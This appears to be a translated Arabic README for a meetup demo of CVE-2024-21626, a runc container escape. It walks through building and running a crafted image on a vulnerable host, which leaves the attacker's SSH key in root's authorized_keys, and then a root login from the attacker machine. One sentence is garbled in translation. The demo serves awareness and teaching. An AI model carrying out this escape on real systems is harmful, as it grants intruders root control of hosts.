
عرض توضيحي لـLT في لقاء Container Runtime #5
عرض توضيحي لـ LT في لقاء Container Runtime Meetup #5.
الغرض هو نشر الوعي حول مخاطر الهجوم بناءً على المعلومات العامة، والاستخدام الضار ممنوع منعاً باتاً.
الجهاز المسجل باسم victim-server في ssh_config للحاسوب المحمول التوضيحي.
ssh victim-server
معلومات الإصدار كشرط مسبق للتعرض للهجوم:
ubuntu@victim-server:$ docker --version
Docker version 20.10.25+dfsg1, build b82b9f3
ubuntu@victim-server:$ runc --version
runc version 1.1.10+ds1
commit: 1.1.10+ds1-1
spec: 1.1.0
go: go1.21.3
libseccomp: 2.5.4
بالمثل
ssh attacker-server
ubuntu@victim-server:~$ git clone [email protected]:laysakura/CVE-2024-21626-demo.git
ubuntu@victim-server:~$ cd CVE-2024-21626-demo/
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker build -t myimage .
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker run -it myimage
/root/.ssh/authorized_keys بمفتاح المهاجم العام دون قصدفي الأصل غير مقصود لذا لا يتم فعل شيء هنا، ولكن يتم عرض أمر للتحقق من الحالة.
ubuntu@victim-server:~$ sudo cat /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKPHHGSytV6bL1ryaEKE9XNWN23piXdzsI3Rzxe20IF6 ubuntu@attacker-server
attacker@attacker-server:~$ ssh -i .ssh/id_ed25519 root@victim-server
root@victim-server:~# id
uid=0(root) gid=0(root) groups=0(root)